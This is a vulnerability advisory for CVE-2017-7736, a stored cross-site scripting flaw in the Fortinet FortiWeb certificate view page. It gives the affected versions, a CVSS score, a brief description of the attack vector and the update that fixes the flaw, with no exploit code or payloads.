Stored cross-site scripting (XSS) in Fortinet FortiWeb

#VU9404 Stored cross-site scripting (XSS) in Fortinet FortiWeb

Published: 2017-11-22 | Updated: 2017-11-23

Vulnerability identifier: #VU9404

Vulnerability risk: Low

CVSSv3.1: 5.6 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N/E:U/RL:O/RC:C]

CVE-ID: CVE-2017-7736

CWE-ID: CWE-79

Exploitation vector: Network

Exploit availability: No

Vulnerable software:
Fortinet FortiWeb
Server applications / Remote management servers, RDP, SSH

Vendor: Fortinet, Inc

Description

Vulnerability allows a remote attacker to perform XSS attacks.

The vulnerability is caused by an input validation error in Fortinet FortiWeb webUI Certificate View page. A remote authenticated attacker can execute arbitrary HTML and script code in victim's browser via special specially crafted malicious certificate import.

Mitigation
Update to version 5.8.1 or 5.7.2.

Vulnerable software versions

Fortinet FortiWeb: 5.8.0, 5.7.0 - 5.7.1

External links
http://fortiguard.com/psirt/FG-IR-17-131

Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.

Latest bulletins with this vulnerability

Stored XSS in Fortinet FortiWeb